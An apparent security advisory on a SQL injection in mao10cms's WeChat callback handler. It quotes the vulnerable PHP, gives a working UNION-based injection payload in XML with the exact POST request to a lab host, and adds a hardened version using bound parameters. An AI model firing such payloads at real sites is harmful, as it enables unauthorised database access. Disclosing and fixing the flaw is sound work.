<ul><li>/Application/Control/Controller/WeixinController.class.php</li></ul><pre class=""> if( $tmpStr == $signature ){
echo $echostr;
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
if (!empty($postStr)){
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$fromUsername = $postObj->FromUserName;
$toUsername = $postObj->ToUserName;
$msgtype = $postObj->MsgType;
$content = trim($postObj->Content);
$date = strtotime("now");
if($content!='')
{
$return_to = M('option')->where('type="wx_huifu" AND meta_key="'.$content.'"')->getField('meta_value');
if($return_to!='') :
$return_to_user = $return_to;
else :
$return_to_user = '我没有理解您的问题,请访问我们的网站:'.mc_site_url();
endif;
echo "<xml>
<ToUserName>$fromUsername</ToUserName>
<FromUserName>$toUsername</FromUserName>
<CreateTime>$date</CreateTime>
<MsgType>text</MsgType>
<Content>$return_to_user</Content>
</xml>";
}
}
</pre><p><code>$content</code> is taken directly from the user-supplied XML and concatenated into the SQL statement, which results in a SQL injection vulnerability.</p><p>When the user submits:</p><pre class=""><?xml version="1.0" encoding="utf-8"?>
<xml>
<ToUserName>aa</ToUserName>
<MsgType>aa</MsgType>
<Content>asdasd") union select user()#</Content>
<FromUserName>a</FromUserName>
</xml>
</pre><p>the SQL statement executed is:</p><pre class="">SELECT `meta_value` FROM `mc_option` WHERE ( type="wx_huifu" AND meta_key="asdasd") union select user()#" ) LIMIT 1</pre><p>The page returns:</p><p><img alt="57145FC8-2F19-448D-BEAF-32A75CF3B061.png" src="https://images.seebug.org/@/uploads/1434332447151-57145FC8-2F19-448D-BEAF-32A75CF3B061.png" data-image-size="364,87"></p><p>This confirms that the vulnerability exists.</p><p>Using Hackbar, POST to:</p><pre class="">http://10.211.55.12/mao10cms/index.php?m=control&c=Weixin&a=callback_url&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709&timestamp=&nonce=&weixin_token=x</pre><p>with the following body:</p><pre class=""><?xml version="1.0" encoding="utf-8"?>
<xml>
<ToUserName>aa</ToUserName>
<MsgType>aa</MsgType>
<Content>asdasd") union select user()#</Content>
<FromUserName>a</FromUserName>
</xml>
</pre><p>The current database user is returned:</p><p><img alt="96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" src="https://images.seebug.org/@/uploads/1434332488347-96F31CC4-694F-48AF-8E5A-9FB9804481A1.png" data-image-size="489,270"></p>
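<p>A hardened version of the lookup, added here as an example and not code from the mao10cms project: the same query with <code>$content</code> bound as a parameter instead of concatenated into the statement text, plus the reply built with its values escaped. It assumes a PDO handle to the same database (the table name <code>mc_option</code> is taken from the query above) and uses the hypothetical function names <code>lookupAutoReply</code> and <code>buildTextReply</code>.</p>

```php
<?php
// Added example, not mao10cms code: the auto-reply lookup from
// WeixinController with the <Content> value passed as a bound parameter
// instead of spliced into the SQL text. Assumes a PDO handle to the same
// database; the table name mc_option comes from the query shown above.

function lookupAutoReply(PDO $pdo, $content)
{
    // Keep the original trim, but refuse values no configured key could have.
    $content = trim((string)$content);
    if ($content === '' || strlen($content) > 64) {
        return null;
    }

    // Vulnerable form, shown for comparison only:
    //   'SELECT meta_value FROM mc_option WHERE ( type="wx_huifu"
    //    AND meta_key="' . $content . '" ) LIMIT 1'
    // Here the statement text is fixed before any input arrives; the payload
    // bytes travel as a parameter value and can only match (or not) a row.
    $stmt = $pdo->prepare(
        'SELECT meta_value FROM mc_option WHERE type = :type AND meta_key = :key LIMIT 1'
    );
    $stmt->execute(array(':type' => 'wx_huifu', ':key' => $content));
    $row = $stmt->fetchColumn();
    return ($row === false || $row === '') ? null : $row;
}

// The same fix with the M() model API the vulnerable code uses: an array
// condition is escaped by the framework instead of trusting a hand-built
// string (assumed framework behaviour; check the installed version):
//   M('option')->where(array('type' => 'wx_huifu', 'meta_key' => $content))
//              ->getField('meta_value');

// Builds the reply with every echoed value escaped, so neither the sender
// fields nor a stored reply can break out of the XML either.
// $msg is the SimpleXMLElement parsed from the incoming request body.
function buildTextReply(SimpleXMLElement $msg, $reply, $siteUrl)
{
    if ($reply === null) {
        $reply = '我没有理解您的问题,请访问我们的网站:' . $siteUrl;
    }
    $x = function ($s) { return htmlspecialchars((string)$s, ENT_QUOTES, 'UTF-8'); };
    return '<xml><ToUserName>' . $x($msg->FromUserName) . '</ToUserName>'
        . '<FromUserName>' . $x($msg->ToUserName) . '</FromUserName>'
        . '<CreateTime>' . time() . '</CreateTime><MsgType>text</MsgType>'
        . '<Content>' . $x($reply) . '</Content></xml>';
}
```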